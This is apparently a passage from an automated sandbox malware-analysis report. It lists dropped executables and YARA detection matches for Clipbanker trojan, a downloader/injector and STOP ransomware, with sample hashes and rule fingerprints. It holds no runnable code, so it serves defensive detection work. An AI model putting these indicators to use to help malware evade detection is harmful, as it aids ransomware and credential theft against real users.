                Source: C:\Users\user\AppData\Local\623f25f4-b030-48f0-b5ce-04f1d0c8fd8b\build3.exe, type: DROPPEDMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
                Source: C:\Users\user\AppData\Local\623f25f4-b030-48f0-b5ce-04f1d0c8fd8b\build3.exe, type: DROPPEDMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\build3[1].exe, type: DROPPEDMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\build3[1].exe, type: DROPPEDMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
                Source: C:\Users\user\AppData\Local\Temp\1543.exe, type: DROPPEDMatched rule: Detects downloader / injector Author: ditekSHen
                Source: C:\Users\user\AppData\Local\Temp\E3B7.exe, type: DROPPEDMatched rule: Detects downloader / injector Author: ditekSHen
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040D6280_2_0040D628
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040D0D70_2_0040D0D7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040DB790_2_0040DB79
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040EF8D0_2_0040EF8D
                Source: C:\Users\user\AppData\Roaming\uwjrhssCode function: 4_2_0040D6284_2_0040D628
                Source: C:\Users\user\AppData\Roaming\uwjrhssCode function: 4_2_0040D0D74_2_0040D0D7
                Source: C:\Users\user\AppData\Roaming\uwjrhssCode function: 4_2_0040DB794_2_0040DB79
                Source: C:\Users\user\AppData\Roaming\uwjrhssCode function: 4_2_0040EF8D4_2_0040EF8D
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 5_2_0392DBE05_2_0392DBE0
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 5_2_03930B005_2_03930B00
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 5_2_0392CA105_2_0392CA10
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 5_2_0394F9B05_2_0394F9B0
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 5_2_0394E9A35_2_0394E9A3
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 5_2_0392B0B05_2_0392B0B0
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 5_2_039300D05_2_039300D0
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 5_2_039418D05_2_039418D0
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 5_2_039230EE5_2_039230EE
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 5_2_0392B0005_2_0392B000
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 5_2_0392C7605_2_0392C760
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 5_2_0392E6E05_2_0392E6E0
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 6_2_0040D2406_2_0040D240
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 6_2_00419F906_2_00419F90
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 6_2_0040C0706_2_0040C070
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 6_2_0042E0036_2_0042E003
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 6_2_0042F0106_2_0042F010
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 6_2_004101606_2_00410160
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 6_2_0044237E6_2_0044237E
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 6_2_004344FF6_2_004344FF
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 6_2_004495066_2_00449506
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 6_2_0043E5A36_2_0043E5A3
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 6_2_0044B5B16_2_0044B5B1
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 6_2_0040A6606_2_0040A660
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 6_2_0041E6906_2_0041E690
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 6_2_0040274E6_2_0040274E
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 6_2_0040A7106_2_0040A710
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 6_2_0040F7306_2_0040F730
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 6_2_0044D7A16_2_0044D7A1
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 6_2_0042C8046_2_0042C804
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 6_2_0044D9DC6_2_0044D9DC
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 6_2_00449A716_2_00449A71
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 6_2_00443B406_2_00443B40
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 6_2_0044ACFF6_2_0044ACFF
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 6_2_0040DD406_2_0040DD40
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 6_2_0040BDC06_2_0040BDC0
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 6_2_0042CE516_2_0042CE51
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 6_2_00420F306_2_00420F30
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 6_2_00449FE36_2_00449FE3
                Source: C:\Windows\explorer.exeSection loaded: windows.web.dllJump to behavior
                Source: XandETC.exe.28.drStatic PE information: Number of sections : 11 > 10
                Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
                Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
                Source: 38.0.build3.exe.ad0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
                Source: 38.0.build3.exe.ad0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
                Source: 13.2.46F.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 13.2.46F.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 31.2.3971.exe.39215a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 31.2.3971.exe.39215a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 23.2.6E6C.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 23.2.6E6C.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 34.2.3971.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 34.2.3971.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 19.2.9721.exe.38f15a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 19.2.9721.exe.38f15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 24.2.46F.exe.38a15a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 24.2.46F.exe.38a15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 39.2.9721.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 39.2.9721.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 39.2.9721.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 39.2.9721.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 12.2.9721.exe.39815a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 12.2.9721.exe.39815a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 25.2.46F.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 25.2.46F.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 27.2.9721.exe.38f15a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 27.2.9721.exe.38f15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 36.2.AB42.exe.38a15a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 36.2.AB42.exe.38a15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 12.2.9721.exe.39815a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 12.2.9721.exe.39815a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 7.2.124D.exe.38c15a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 7.2.124D.exe.38c15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 26.2.9721.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 26.2.9721.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 7.2.124D.exe.38c15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 7.2.124D.exe.38c15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 8.2.124D.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 8.2.124D.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 35.2.9721.exe.39e15a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 35.2.9721.exe.39e15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 24.2.46F.exe.38a15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 24.2.46F.exe.38a15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 15.2.F42F.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 15.2.F42F.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 29.2.9721.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 29.2.9721.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 36.2.AB42.exe.38a15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 36.2.AB42.exe.38a15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 38.2.build3.exe.ad0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
                Source: 38.2.build3.exe.ad0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
                Source: 8.2.124D.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 8.2.124D.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 13.2.46F.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 13.2.46F.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 25.2.46F.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 25.2.46F.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 5.2.9721.exe.39215a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 5.2.9721.exe.39215a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 34.2.3971.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
